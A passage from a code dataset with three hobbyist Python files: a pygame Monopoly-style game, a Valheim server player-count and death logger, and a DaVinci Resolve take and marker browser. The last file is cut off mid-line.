[4000, None, 0, 4], 'северный порт' : [4000, None, 0, 1], \n 'аудиосалон' : [4000, None, 0, 5], 'лотерея1' : [-1], 'видеосалон' : [4000, None, 0, 5], 'TV-магазин' : [4000, None, 0, 5], 'отделение полиции' : [-1],\n 'салон связи': [4000, None, 0, 6], 'налоги1' : [-1], 'салон игр' : [4000, None, 0, 6], 'компьютеры и оргтехника' : [4000, None, 0, 6], 'восточный порт': [4000, None, 0, 1], \n 'спортзал' : [4000, None, 0, 7], 'водоснажебние' : [4000, None, 0, 3], 'бассейн' : [4000, None, 0, 7], 'гольфклуб' : [4000, None, 0, 7], 'стадион' : [-1], 'магазин мототехники': [4000, None, 0, 8],\n 'автосалон' : [4000, None, 0, 8], 'шанс' : [-1], 'салон спец-автотехника' : [4000, None, 0, 8], 'южный порт': [4000, None, 0, 1], \n 'автотранс' : [4000, None, 0, 9], 'лотерея' : [-1], 'железная дорога' : [4000, None, 0, 9], 'авиакомпания' : [4000, None, 0, 9], \n 'пустая клетка' : [-1], 'пресса' : [4000, None, 0, 0], 'колл-центр' : [3800, None, 0, 0], 'налоги' : [-1], 'книжный магазин' : [4400, None, 0, 0],\n 'западный порт' : [4000, None, 0, 1], 'закусочная' : [4000, None, 0, 2], 'электричество' : [4000, None, 0, 3], 'bar' : [4000, None, 0, 2], 'кафе': [4000, None, 0, 2]}\n\ncells_count = len(property_list)\n\nsphere_code = 10\n\nclass Interface:\n def __init__(self, players_list):\n self.players_list = players_list\n self.surface_info = pygame.Surface((LENGHT - HEIGHT, 300))\n self.surface_step = pygame.Surface((LENGHT - HEIGHT, 150))\n self.rect_step = self.surface_step.get_rect(topleft=(HEIGHT, 300))\n self.rect_info = self.surface_info.get_rect(topleft=(HEIGHT, 0))\n self.font = pygame.font.SysFont('arial', 15)\n\n def render_text(self, str_, surface, cords=(0,0)):\n text = self.font.render(str_, True, (0, 0, 0))\n text_rect = text.get_rect(topleft=cords)\n surface.blit(text, text_rect)\n\n def render_properties(self, x=0, player_number=0):\n for j in range(len(self.players_list[player_number].properties)):\n self.render_text(str(self.players_list[player_number].properties[j][0]), self.surface_info, (x, 60 + 20 * j))\n\n def render_plyer_info(self, player_number, cords):\n x, y = cords\n self.render_text(self.players_list[player_number].name, self.surface_info, (x, y))\n self.render_text(str(self.players_list[player_number].money), self.surface_info, (x, y + 20))\n self.render_text(str(self.players_list[player_number].cell), self.surface_info, (x, y + 40))\n self.render_properties(x, player_number)\n\n def rendering(self):\n self.surface_info.fill((100, 150, 200))\n self.surface_step.fill((100, 150, 200))\n self.render_plyer_info(0, (0, 0))\n self.render_plyer_info(1, (200, 0))\n screen.blit(self.surface_info, self.rect_info)\n screen.blit(self.surface_step, self.rect_step)\n\n\n def step(self, player):\n self.surface_step.fill((100, 150, 200))\n text_1 = f'имя игрока: {player.name}'\n text_2 = f'номер клетки: {player.cell}'\n property_name = list(property_list)[player.cell]\n text_3 = f'клетка: {property_name}'\n text_4 = '1 - купить, 0 - отказаться'\n\n self.render_text(text_1, self.surface_step, (20, 40))\n self.render_text(text_2, self.surface_step, (20, 60))\n self.render_text(text_3, self.surface_step, (20, 80))\n self.render_text(text_4, self.surface_step, (20, 100))\n\n screen.blit(self.surface_step, self.rect_step)\n\n pygame.display.update()\n\n def transfer_print(self, player_from, player_to, sum):\n self.surface_step.fill((100, 150, 200))\n\n text = f'{player_from} дал {player_to} {sum}$'\n self.render_text(text, self.surface_step, (20, 60))\n screen.blit(self.surface_step, 
self.rect_step)\n\n pygame.display.update()\n\n print(text)\n\n def forfeit(self, player):\n self.surface_step.fill((100, 150, 200))\n text = f'{player.name} заплатил налоги' \n self.render_text(text, self.surface_step, (20, 60))\n screen.blit(self.surface_step, self.rect_step)\n\n pygame.display.update()\n\n def skip(self, player):\n self.surface_step.fill((100, 150, 200))\n text = f'{player.name} попал в обезьянник за пьяный дебош, пропуск хода'\n self.render_text(text, self.surface_step, (20, 60))\n screen.blit(self.surface_step, self.rect_step)\n\n pygame.display.update()\n \n def chance(self, plyaer):\n text = f'{plyaer.name} получается шанс получить 1000 денег'\n self.render_text(text, self.surface_step, (20, 60))\n screen.blit(self.surface_step, self.rect_step)\n\n pygame.display.update()\n\n def lotery(self, plyaer):\n text = f'{plyaer.name} крутит рулетку...'\n self.render_text(text, self.surface_step, (20, 60))\n screen.blit(self.surface_step, self.rect_step)\n \n pygame.display.update()\n\n def surcharge(self, player):\n self.surface_step.fill((100, 150, 200))\n text = f'{player.name} подрался с работником налоговой и подвергся'\n text_2 = 'дополнительному налогооблажению'\n self.render_text(text, self.surface_step, (20, 60))\n self.render_text(text_2, self.surface_step, (20, 80))\n screen.blit(self.surface_step, self.rect_step)\n\n pygame.display.update()\n \n def start_position(self, player):\n self.surface_step.fill((100, 150, 200))\n text = f'{player.name} закончил ход!!!' \n self.render_text(text, self.surface_step, (20, 60))\n screen.blit(self.surface_step, self.rect_step)\n\n pygame.display.update()\n\n def purchased_cell(self, player):\n self.surface_step.fill((100, 150, 200))\n text = f'эта клетка уже куплена игроком {player.name}' \n self.render_text(text, self.surface_step, (20, 60))\n screen.blit(self.surface_step, self.rect_step)\n\n pygame.display.update()\n\n\nclass Player:\n def __init__(self, name):\n self.name = name\n self.money = 15000\n self.cell = 0\n self.cell_plus_1 = random.randint(1, 6)\n self.cell_plus_2 = random.randint(1, 6)\n self.skip = False\n self.properties = []\n\n def roll(self):\n self.cell_plus_1 = random.randint(1, 6)\n self.cell_plus_2 = random.randint(1, 6)\n\n def dice_roll(self):\n self.roll()\n self.cell = (self.cell + self.cell_plus_1 + self.cell_plus_2)\n if self.cell >= cells_count:\n self.money += 1000\n print(f'{self.name} вернулся на стартовую позицию и получил 1000!')\n self.cell %= cells_count\n\n def cost_for_another_players(self):\n temp_count = [0 for i in range(sphere_code)]\n for prop in self.properties:\n temp_count[prop[1]] += 1\n \n for i in range(len(temp_count)):\n coef = 1\n\n if temp_count[i] == 2:\n coef = 1.2\n if temp_count[i] >= 3:\n coef = 1.4\n\n for j in self.properties:\n if j[1] == i:\n property_list[j[0]][2] = property_list[j[0]][0] // 10 * coef\n\n def transef_of_money(self, player_2, sum):\n self.money -= sum\n player_2.money += sum\n\n def read_choice(self):\n while True:\n for i in pygame.event.get():\n if i.type == pygame.QUIT:\n sys.exit()\n\n elif i.type == pygame.KEYDOWN:\n if i.key == pygame.K_1:\n return 1\n if i.key == pygame.K_0:\n return 0\n\n def in_cell(self, choice):\n property_name = list(property_list)[self.cell]\n property_price = property_list[property_name][0]\n owner = property_list[property_name][1]\n \n # cost_for_stand = property_list[property_name][2]\n # if owner != self.name and owner != None and cost_for_stand > 0:\n # return owner, cost_for_stand\n\n # choice = 
self.read_choice()\n\n\n if choice and self.money > property_price and owner == None:\n property_list[property_name][1] = self.name\n property_list[property_name][2] = property_price // 10\n self.properties.append([property_name, property_list[property_name][3]])\n self.money -= property_price\n self.cost_for_another_players()\n \n #return None, 0\n \n\n def __str__(self):\n return self.name + ' ' + str(self.money) + ' ' + str(self.cell)\n\n\nclass Game:\n def __init__(self, players_count=2):\n self.players_count = players_count\n self.players = []\n self.player_number = 0\n self.players_create()\n self.interface = Interface(self.players)\n\n def players_create(self):\n for i in range(self.players_count):\n name = input(f'Input {i + 1} player name: ')\n player = Player(name)\n self.players.append(player)\n\n def transaction(self, player_to, player_from, sum_):\n player_to.money += sum_\n player_from.money -= sum_\n\n def give_player_obj_from_name(self, name):\n for i in self.players:\n if i.name == name:\n return i\n\n def move(self):\n active_player = self.players[self.player_number]\n if not active_player.skip:\n property_name = list(property_list)[active_player.cell]\n if len(property_list[property_name]) == 1:\n if property_name in ['налоги', 'налоги1']:\n r = random.randint(1, 2)\n if r == 1:\n special_cells.forfeit(active_player)\n self.interface.forfeit(active_player)\n else:\n special_cells.surcharge(active_player)\n self.interface.surcharge(active_player)\n elif property_name == 'отделение полиции':\n special_cells.skip(active_player)\n self.interface.skip(active_player)\n elif property_name in ['лотерея', 'лотерея1']:\n special_cells.lotery(active_player)\n self.interface.lotery(active_player)\n elif property_name in ['шанс', 'шанс1']:\n special_cells.chance(active_player)\n self.interface.chance(active_player)\n else:\n property_name = list(property_list)[active_player.cell]\n property_price = property_list[property_name][0]\n owner = property_list[property_name][1]\n \n cost_for_stand = property_list[property_name][2]\n player_to = self.give_player_obj_from_name(owner)\n if owner != active_player.name and player_to != None:\n # owner, cost_for_stand\n # if player_to_name != None and sum != 0: \n self.transaction(player_to, active_player, cost_for_stand)\n self.interface.transfer_print(active_player.name, owner, cost_for_stand)\n elif owner == active_player.name:\n self.interface.purchased_cell(active_player)\n else:\n self.interface.step(active_player)\n choice = active_player.read_choice()\n \n active_player.in_cell(choice)\n \n self.player_number = (self.player_number + 1) % self.players_count\n\n else:\n print('отдохни и пропусти ход')\n active_player.skip = False\n\n def active(self):\n for player in self.players:\n if player.money < 0:\n return False\n\n return True\n\n\nclass Image():\n def __init__(self, path):\n self.surf = pygame.image.load(path)\n self.rect = self.surf.get_rect()\n\n def resize(self, field_pieces=1):\n self.surf = pygame.transform.scale(self.surf, (self.surf.get_width() // field_pieces, self.surf.get_height() // field_pieces))\n self.rect = self.surf.get_rect()\n\n def rendering(self, x=0, y=0, center=None):\n if center:\n self.rect.centerx = x\n self.rect.centery = y\n else:\n self.rect.x = x\n self.rect.y = y\n screen.blit(self.surf, self.rect)\n \n\nfield = Image('D:\\python_projects\\\\anya_python\\monopoly\\monopoly\\imgs\\\\table.bmp')\nfield.rendering()\n\ncube_1 = 
Image('D:\\python_projects\\\\anya_python\\monopoly\\monopoly\\imgs\\die1.jpg')\ncube_2 = Image('D:\\python_projects\\\\anya_python\\monopoly\\monopoly\\imgs\\die2.jpg')\ncube_1.resize(8)\ncube_2.resize(8)\ncube_1.rendering(600, 475)\ncube_2.rendering(700, 475)\n\ncubes = []\nfor i in range(1, 7):\n cube = Image(f'D:\\python_projects\\\\anya_python\\monopoly\\monopoly\\imgs\\die{i}.jpg')\n cube.resize(8)\n cubes.append(cube)\n\nfield_pieces = HEIGHT / 15\nicons = []\ndef append_player_icon(path):\n icon = Image(path)\n icon.resize(10)\n icon.rendering(field_pieces * 1.5, field_pieces * 1.5, True)\n icons.append(icon)\n\nappend_player_icon('D:\\python_projects\\\\anya_python\\monopoly\\monopoly\\imgs\\hat.png')\nappend_player_icon('D:\\python_projects\\\\anya_python\\monopoly\\monopoly\\imgs\\car.png')\nappend_player_icon('D:\\python_projects\\\\anya_python\\monopoly\\monopoly\\imgs\\iron.png')\nappend_player_icon('D:\\python_projects\\\\anya_python\\monopoly\\monopoly\\imgs\\ship.png')\n\npygame.display.update()\nplayer_numbers = 2\ngame = Game()\nk = 1\nwhile game.active():\n if k:\n print('Press space for make move')\n k = 0\n\n for i in pygame.event.get():\n if i.type == pygame.QUIT:\n sys.exit()\n\n elif i.type == pygame.KEYDOWN:\n if i.key == pygame.K_SPACE:\n k = 1\n active_player = game.players[game.player_number]\n print('active player: ', active_player)\n if not active_player.skip:\n active_player.dice_roll()\n game.interface.rendering()\n cube_1 = cubes[active_player.cell_plus_1 - 1]\n cube_2 = cubes[active_player.cell_plus_2 - 1]\n cube_1.rendering(700, 475)\n cube_2.rendering(600, 475)\n icon = icons[game.player_number]\n\n field.rendering()\n for i in range(player_numbers):\n if i != game.player_number:\n icons[i].rendering(icons[i].rect.x, icons[i].rect.y)\n\n #изменять в условия только координаты\n if active_player.cell // 10 == 0:\n icon.rendering(field_pieces * 3.5 + field_pieces * (active_player.cell - 1), field_pieces * 1.5, True) \n elif active_player.cell // 10 == 1:\n icon.rendering(LENGHT - 425 - field_pieces * 1.5, HEIGHT - field_pieces * 3.5 - field_pieces * (9 - active_player.cell % 10), True)\n elif active_player.cell // 10 == 2:\n icon.rendering(HEIGHT - field_pieces * 3.5 - field_pieces * (active_player.cell % 10 - 1), HEIGHT - field_pieces * 1.5, True)\n elif active_player.cell // 10 == 3:\n icon.rendering(field_pieces * 1.5, HEIGHT - 3.5 * field_pieces - field_pieces * (active_player.cell % 10 - 1), True)\n\n pygame.display.update()\n\n print(active_player.cell)\n print(active_player.cell_plus_1)\n print(active_player.cell_plus_2)\n game.move()\n\n\n\n pygame.display.flip()","repo_name":"reeegry/monopoly","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":16680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9357521607","text":"from datetime import datetime\r\nimport time, os, re\r\nimport csv, asyncio\r\nfrom valve.source.a2s import ServerQuerier, NoResponseError\r\nimport config\r\n\r\npdeath = '.*?Got character ZDOID from (\\w+) : 0:0'\r\nlog = config.file\r\n\r\nasync def timenow():\r\n now = datetime.now()\r\n gettime = now.strftime(\"%d/%m/%Y %H:%M:%S\")\r\n return gettime\r\n\r\nasync def writecsv():\r\n while True: \r\n try:\r\n with ServerQuerier(config.SERVER_ADDRESS) as server:\r\n with open('csv/playerstats.csv', 'a', newline='') as f:\r\n csvup = csv.writer(f, delimiter=',') \r\n curtime, players = await timenow(), server.info()['player_count']\r\n 
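Note on `Player.dice_roll` in the monopoly record above: it advances the token by two dice, pays the pass-go bonus when the position overflows the board, and wraps with a modulo. The wrap-and-bonus arithmetic in isolation — constants here are illustrative; the game derives its cell count from `property_list`:

```python
import random

CELLS = 40        # illustrative board size
GO_BONUS = 1000   # matches the record's start-cell bonus

def advance(cell, rng):
    """Roll two dice; return (new_cell, bonus_paid)."""
    step = rng.randint(1, 6) + rng.randint(1, 6)
    raw = cell + step
    bonus = GO_BONUS if raw >= CELLS else 0   # passed (or landed on) the start cell
    return raw % CELLS, bonus

rng = random.Random(0)
cell, money = 38, 0                           # two cells before "go"
cell, bonus = advance(cell, rng)
money += bonus
print(cell, money)                            # wrapped position, bonus credited
```

Checking `raw >= CELLS` before taking the modulo is the important ordering: testing the wrapped value instead would never detect the pass.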
csvup.writerow([curtime, players])\r\n print(curtime, players)\r\n except NoResponseError:\r\n with open('csv/playerstats.csv', 'a', newline='') as f:\r\n csvup = csv.writer(f, delimiter=',') \r\n curtime, players = await timenow(), '0'\r\n csvup.writerow([curtime, players])\r\n print(curtime, 'Cannot connect to server')\r\n await asyncio.sleep(60)\r\n\r\nasync def deathcount():\r\n while True: \r\n with open(log, encoding='utf-8', mode='r') as f:\r\n f.seek(0,2)\r\n while True:\r\n line = f.readline()\r\n if(re.search(pdeath, line)):\r\n pname = re.search(pdeath, line).group(1)\r\n with open('csv/deathlog.csv', 'a', newline='', encoding='utf-8') as dl:\r\n curtime = await timenow()\r\n deathup = csv.writer(dl, delimiter=',')\r\n deathup.writerow([curtime, pname])\r\n print(curtime, pname, ' has died!')\r\n await asyncio.sleep(0.2)\r\n\r\nloop = asyncio.get_event_loop()\r\nloop.create_task(deathcount())\r\nloop.create_task(writecsv())\r\nloop.run_forever()\r\n","repo_name":"ckbaudio/valheim-discord-bot","sub_path":"code/_logsubprocess.py","file_name":"_logsubprocess.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"61"} +{"seq_id":"40669040902","text":"# Zachary Korpi, Jimmy Qiu\nimport os\nimport re\nimport sys\nimport math\nimport time\n\ndef GetResolve():\n try:\n # The PYTHONPATH needs to be set correctly for this import statement to work.\n # An alternative is to import the DaVinciResolveScript by specifying absolute path (see ExceptionHandler logic)\n import DaVinciResolveScript as bmd\n except ImportError:\n if sys.platform.startswith(\"darwin\"):\n expectedPath=\"/Library/Application Support/Blackmagic Design/DaVinci Resolve/Developer/Scripting/Modules/\"\n elif sys.platform.startswith(\"win\") or sys.platform.startswith(\"cygwin\"):\n import os\n expectedPath=os.getenv('PROGRAMDATA') + \"\\\\Blackmagic Design\\\\DaVinci Resolve\\\\Support\\\\Developer\\\\Scripting\\\\Modules\\\\\"\n elif sys.platform.startswith(\"linux\"):\n expectedPath=\"/opt/resolve/Developer/Scripting/Modules/\"\n\n # check if the default path has it...\n print(\"Unable to find module DaVinciResolveScript from $PYTHONPATH - trying default locations\")\n try:\n import imp\n bmd = imp.load_source('DaVinciResolveScript', expectedPath+\"DaVinciResolveScript.py\")\n except ImportError:\n # No fallbacks ... 
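Note on `deathcount` in the Valheim-bot record above: it tails the server log with the classic seek-to-end-and-poll idiom, matching death lines against the record's `pdeath` regex. The same idiom as a small synchronous generator, independent of the bot and of Discord:

```python
import re
import time

PDEATH = re.compile(r'.*?Got character ZDOID from (\w+) : 0:0')  # pattern from the record

def follow(path):
    """Yield new lines appended to `path`, like `tail -f`."""
    with open(path, encoding='utf-8') as f:
        f.seek(0, 2)                 # jump to the end: only future lines matter
        while True:
            line = f.readline()
            if not line:
                time.sleep(0.2)      # nothing new yet; poll again
                continue
            yield line

# usage sketch (path is illustrative):
# for line in follow("valheim_server.log"):
#     m = PDEATH.match(line)
#     if m:
#         print(m.group(1), "has died!")
```

`readline()` returning an empty string at EOF (rather than blocking) is what makes this polling loop work; the async version in the record replaces `time.sleep` with `asyncio.sleep` so the A2S query task can run concurrently.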
report error:\n print(\"Unable to find module DaVinciResolveScript - please ensure that the module DaVinciResolveScript is discoverable by python\")\n print(\"For a default DaVinci Resolve installation, the module is expected to be located in: \"+expectedPath)\n sys.exit()\n\n return bmd.scriptapp(\"Resolve\")\n\nresolve = GetResolve()\nfu = bmd.scriptapp('Fusion')\nui = app.UIManager\ndisp = bmd.UIDispatcher(ui)\npm = resolve.GetProjectManager()\nproj = pm.GetCurrentProject()\ntl = proj.GetCurrentTimeline()\nmarker_color = ['All','Blue','Cyan','Green','Yellow','Red','Pink','Purple','Fuchsia','Rose','Lavender','Sky','Mint','Lemon','Sand','Cocoa','Cream']\nrefresher = '1'\nframerate = 24\n\ndef getresolve(app='Resolve'):\n dr = bmd.scriptapp(app)\n return dr\n\ndef _exit(ev):\n disp.ExitLoop()\n\ndef this_timeline():\n return proj.GetCurrentTimeline()\n\ndef read_all_marker():\n mks = this_timeline().GetMarkers()\n print(mks)\n return mks\n\ndef read_timeline_startTC():\n tc = this_timeline().GetStartFrame()\n print(tc)\n return tc\n\ndef merge_two_dicts(x, y):\n z =x.copy()\n z.update(y)\n return z\n\ndef frames_to_timecode(total_frames, frame_rate, drop): ##credits to Manne Ohrstrom and Shotgun Software Inc.\n \"\"\"\n Method that converts frames to SMPTE timecode.\n \n :param total_frames: Number of frames\n :param frame_rate: frames per second\n :param drop: true if time code should drop frames, false if not\n :returns: SMPTE timecode as string, e.g. '01:02:12:32' or '01:02:12;32'\n \"\"\"\n if drop and frame_rate not in [29.97, 59.94]:\n raise NotImplementedError(\"Time code calculation logic only supports drop frame \"\n \"calculations for 29.97 and 59.94 fps.\")\n\n # for a good discussion around time codes and sample code, see\n # http://andrewduncan.net/timecodes/\n\n # round fps to the nearest integer\n # note that for frame rates such as 29.97 or 59.94,\n # we treat them as 30 and 60 when converting to time code\n # then, in some cases we 'compensate' by adding 'drop frames',\n # e.g. 
jump in the time code at certain points to make sure that\n # the time code calculations are roughly right.\n #\n # for a good explanation, see\n # https://documentation.apple.com/en/finalcutpro/usermanual/index.html#chapter=D%26section=6\n fps_int = int(round(frame_rate))\n\n if drop:\n # drop-frame-mode\n # add two 'fake' frames every minute but not every 10 minutes\n #\n # example at the one minute mark:\n #\n # frame: 1795 non-drop: 00:00:59:25 drop: 00:00:59;25\n # frame: 1796 non-drop: 00:00:59:26 drop: 00:00:59;26\n # frame: 1797 non-drop: 00:00:59:27 drop: 00:00:59;27\n # frame: 1798 non-drop: 00:00:59:28 drop: 00:00:59;28\n # frame: 1799 non-drop: 00:00:59:29 drop: 00:00:59;29\n # frame: 1800 non-drop: 00:01:00:00 drop: 00:01:00;02\n # frame: 1801 non-drop: 00:01:00:01 drop: 00:01:00;03\n # frame: 1802 non-drop: 00:01:00:02 drop: 00:01:00;04\n # frame: 1803 non-drop: 00:01:00:03 drop: 00:01:00;05\n # frame: 1804 non-drop: 00:01:00:04 drop: 00:01:00;06\n # frame: 1805 non-drop: 00:01:00:05 drop: 00:01:00;07\n #\n # example at the ten minute mark:\n #\n # frame: 17977 non-drop: 00:09:59:07 drop: 00:09:59;25\n # frame: 17978 non-drop: 00:09:59:08 drop: 00:09:59;26\n # frame: 17979 non-drop: 00:09:59:09 drop: 00:09:59;27\n # frame: 17980 non-drop: 00:09:59:10 drop: 00:09:59;28\n # frame: 17981 non-drop: 00:09:59:11 drop: 00:09:59;29\n # frame: 17982 non-drop: 00:09:59:12 drop: 00:10:00;00\n # frame: 17983 non-drop: 00:09:59:13 drop: 00:10:00;01\n # frame: 17984 non-drop: 00:09:59:14 drop: 00:10:00;02\n # frame: 17985 non-drop: 00:09:59:15 drop: 00:10:00;03\n # frame: 17986 non-drop: 00:09:59:16 drop: 00:10:00;04\n # frame: 17987 non-drop: 00:09:59:17 drop: 00:10:00;05\n\n # calculate number of drop frames for a 29.97 std NTSC\n # workflow. Here there are 30*60 = 1800 frames in one\n # minute\n\n FRAMES_IN_ONE_MINUTE = 1800 - 2\n\n FRAMES_IN_TEN_MINUTES = (FRAMES_IN_ONE_MINUTE * 10) - 2\n\n ten_minute_chunks = total_frames / FRAMES_IN_TEN_MINUTES\n one_minute_chunks = total_frames % FRAMES_IN_TEN_MINUTES\n\n ten_minute_part = 18 * ten_minute_chunks\n one_minute_part = 2 * ((one_minute_chunks - 2) / FRAMES_IN_ONE_MINUTE)\n\n if one_minute_part < 0:\n one_minute_part = 0\n\n # add extra frames\n total_frames += ten_minute_part + one_minute_part\n\n # for 60 fps drop frame calculations, we add twice the number of frames\n if fps_int == 60:\n total_frames = total_frames * 2\n\n # time codes are on the form 12:12:12;12\n smpte_token = \";\"\n\n else:\n # time codes are on the form 12:12:12:12\n smpte_token = \":\"\n\n # now split our frames into time code\n hours = int(total_frames / (3600 * fps_int))\n minutes = int(total_frames / (60 * fps_int) % 60)\n seconds = int(total_frames / fps_int % 60)\n frames = int(total_frames % fps_int)\n return \"%02d:%02d:%02d%s%02d\" % (hours, minutes, seconds, smpte_token, frames) # usage example print frames_to_timecode(123214, 24, False)\n\ndef get_all_timeline_items():\n TimelineConca = []\n TimelineDict = dict()\n for i in range(1, trackcount + 1):\n TimelineItem = this_timeline().GetItemListInTrack(\"video\", i)\n TimelineConca = TimelineConca + TimelineItem\n for item in TimelineConca:\n enable_check = item.GetClipEnabled()\n if enable_check == True: \n frameID = item.GetStart()\n TimelineDictItem = {frameID: item}\n TimelineDict = merge_two_dicts(TimelineDict, TimelineDictItem)\n TimelineDict = OrderedDict(sorted(TimelineDict.items()))\n return TimelineDict\n\ndef read_all_timeline_clips(ev):\n itm['tree'].Clear()\n global refresher\n refresher = 
'1'\n mrk = itm['tree'].NewItem()\n mrk.Text[0] = 'ID'\n mrk.Text[1] = 'Name'\n mrk.Text[2] = 'Record In'\n mrk.Text[3] = 'Record Out'\n mrk.Text[4] = 'Takes'\n itm['tree'].SetHeaderItem(mrk)\n\n itm['tree'].ColumnCount = 5\n\n itm['tree'].ColumnWidth[0] = 75\n itm['tree'].ColumnWidth[1] = 200\n itm['tree'].ColumnWidth[2] = 100\n itm['tree'].ColumnWidth[3] = 100\n itm['tree'].ColumnWidth[4] = 50\n\n trackcount = this_timeline().GetTrackCount(\"video\")\n i = 0\n TimelineDict = get_all_timeline_items()\n if itm['takes_only'].Checked == True:\n for frameID in TimelineDict:\n item = TimelineDict[frameID]\n enable_check = item.GetClipEnabled()\n takes_count = item.GetTakesCount()\n if enable_check == True and takes_count > 1:\n i= i + 1\n mrk.Text[1] = 'Reel Name'\n mrk.Text[5] = 'Date Added'\n itm['tree'].ColumnCount = 6\n itm['tree'].ColumnWidth[5] = 200\n itRow = itm['tree'].NewItem()\n itRow.Text[0] = str(i)\n itRow.Text[1] = str(item.GetMediaPoolItem().GetClipProperty('Reel Name'))\n itRow.Text[2] = str(frames_to_timecode(item.GetStart(), framerate, False))\n itRow.Text[3] = str(frames_to_timecode(item.GetEnd(), framerate, False))\n itRow.Text[4] = str(takes_count)\n itRow.Text[5] = str(item.GetMediaPoolItem().GetClipProperty('Date Added'))\n itm['tree'].AddTopLevelItem(itRow)\n itm['tree'].SortByColumn(2, \"AscendingOrder\")\n else:\n for frameID in TimelineDict:\n item = TimelineDict[frameID]\n enable_check = item.GetClipEnabled()\n if enable_check == True:\n i= i + 1\n itRow = itm['tree'].NewItem()\n itRow.Text[0] = str(i)\n itRow.Text[1] = item.GetName()\n itRow.Text[2] = str(frames_to_timecode(item.GetStart(), framerate, False))\n itRow.Text[3] = str(frames_to_timecode(item.GetEnd(), framerate, False))\n itRow.Text[4] = str(item.GetTakesCount())\n itm['tree'].AddTopLevelItem(itRow)\n itm['tree'].SortByColumn(2, \"AscendingOrder\")\n\ndef get_nearest_less_element(d, k):\n k = int(k)\n nearest = max(key for key in map(int, d.keys()) if key <= k)\n return nearest\n\ndef take_index_dict(current_clip):\n index_count = current_clip.GetTakesCount()\n take_conca = {}\n for i in range(1, index_count + 1):\n take_info = {i:current_clip.GetTakeByIndex(i)}\n take_conca = merge_two_dicts(take_conca, take_info)\n take_conca = OrderedDict(reversed(sorted(take_conca.items())))\n return take_conca\n\ndef read_current_take(current_clip, take_index):\n itm['current_tree'].UpdatesEnabled = False\n itm['current_tree'].Clear()\n crt = itm['current_tree'].NewItem()\n crt.Text[0] = 'ID'\n crt.Text[1] = 'Clip Name'\n crt.Text[2] = 'Record In'\n crt.Text[3] = 'Record Out'\n crt.Text[4] = 'Takes'\n crt.Text[5] = 'Date Added'\n itm['current_tree'].SetHeaderItem(crt)\n itm['current_tree'].ColumnCount = 6\n\n itm['current_tree'].ColumnWidth[0] = 50\n itm['current_tree'].ColumnWidth[1] = 200\n itm['current_tree'].ColumnWidth[2] = 100\n itm['current_tree'].ColumnWidth[3] = 100\n itm['current_tree'].ColumnWidth[4] = 50\n itm['current_tree'].ColumnWidth[5] = 150\n Take_Dict = take_index_dict(current_clip)\n i = 0\n for takeID in Take_Dict:\n item_dict = Take_Dict[takeID]\n item = item_dict['mediaPoolItem']\n #startframe = item_dict['startFrame']\n\n crtRow = itm['current_tree'].NewItem()\n i= i + 1\n crtRow.Text[0] = str(i)\n crtRow.Text[1] = str(item.GetClipProperty('Clip Name'))\n crtRow.Text[2] = str(frames_to_timecode(current_clip.GetStart(), framerate, False))\n crtRow.Text[3] = str(frames_to_timecode(current_clip.GetEnd(), framerate, False))\n crtRow.Text[4] = str(current_clip.GetTakesCount())\n crtRow.Text[5] 
= str(item.GetClipProperty('Date Added'))\n if takeID == take_index:\n for n in range(0, 6):\n crtRow.BackgroundColor[n] = { 'R':99/255, 'G':99/255, 'B':99/255, 'A':0.5 }\n itm['current_tree'].AddTopLevelItem(crtRow)\n itm['current_tree'].UpdatesEnabled = True\n\ndef _show_takes(ev):\n current_clip = tl.GetCurrentVideoItem()\n current_take = int(current_clip.GetSelectedTakeIndex())\n read_current_take(current_clip, current_take)\n itm['show_take'].Hidden = True\n\ndef _previous_take(ev):\n current_clip = tl.GetCurrentVideoItem()\n current_takes_available = int(current_clip.GetTakesCount())\n current_take = int(current_clip.GetSelectedTakeIndex())\n if current_takes_available > 0:\n if current_take <= current_takes_available and current_take > 1:\n select_take = current_clip.SelectTakeByIndex(current_take - 1)\n take_index = current_take - 1\n read_current_take(current_clip, take_index)\n elif current_take == 1:\n select_take = current_clip.SelectTakeByIndex(1)\n take_index = 1\n read_current_take(current_clip, take_index)\n else:\n pass\n\ndef _next_take(ev):\n current_clip = tl.GetCurrentVideoItem()\n current_takes_available = int(current_clip.GetTakesCount())\n current_take = int(current_clip.GetSelectedTakeIndex())\n if current_takes_available > 0:\n if current_take < current_takes_available:\n select_take = current_clip.SelectTakeByIndex(current_take + 1)\n take_index = current_take + 1\n read_current_take(current_clip, take_index)\n elif current_take == current_takes_available:\n select_take = current_clip.SelectTakeByIndex(current_takes_available)\n take_index = current_takes_available\n read_current_take(current_clip, take_index)\n else:\n pass\n\ndef _double_click(ev):\n print(str(ev['item'].Text[0]))\n x = str(ev['item'].Text[0])\n current_clip = tl.GetCurrentVideoItem()\n current_takes_available = int(current_clip.GetTakesCount())\n current_clip.SelectTakeByIndex(current_takes_available-(int(x)-1))\n read_current_take(current_clip, int(current_clip.GetSelectedTakeIndex()))\n\ndef read_marker_color(color_filter):\n itm['tree'].Clear()\n global refresher\n refresher = '0'\n mrk = itm['tree'].NewItem()\n mrk.Text[0] = 'ID'\n mrk.Text[1] = 'Clip Name'\n mrk.Text[2] = 'Timecode'\n mrk.Text[3] = 'Takes'\n mrk.Text[4] = 'Color'\n mrk.Text[5] = 'Name'\n mrk.Text[6] = 'Notes'\n itm['tree'].SetHeaderItem(mrk)\n\n itm['tree'].ColumnCount = 7\n\n itm['tree'].ColumnWidth[0] = 50\n itm['tree'].ColumnWidth[1] = 150\n itm['tree'].ColumnWidth[2] = 75\n itm['tree'].ColumnWidth[3] = 50\n itm['tree'].ColumnWidth[4] = 60\n itm['tree'].ColumnWidth[5] = 100\n itm['tree'].ColumnWidth[6] = 150\n start_tc = read_timeline_startTC()\n all_marker = read_all_marker()\n all_marker = OrderedDict(sorted(all_marker.items()))\n i = 0\n TimelineDict = get_all_timeline_items()\n for mk_frameId in all_marker:\n marker_list = []\n mk = all_marker[mk_frameId]\n frame = mk_frameId + start_tc\n nearest = get_nearest_less_element(TimelineDict, frame)\n clipname = str(TimelineDict[nearest].GetName())\n takes_count = TimelineDict[nearest].GetTakesCount()\n color = str(mk['color'])\n duration = int(mk['duration'])\n note = str(mk['note'])\n name = str(mk['name'])\n customData = mk['customData']\n if itm['takes_only'].Checked == True:\n if color == color_filter or color_filter == 'All' and takes_count > 1:\n i= i + 1\n marker_list = [mk_frameId, color, duration, note, name, customData, 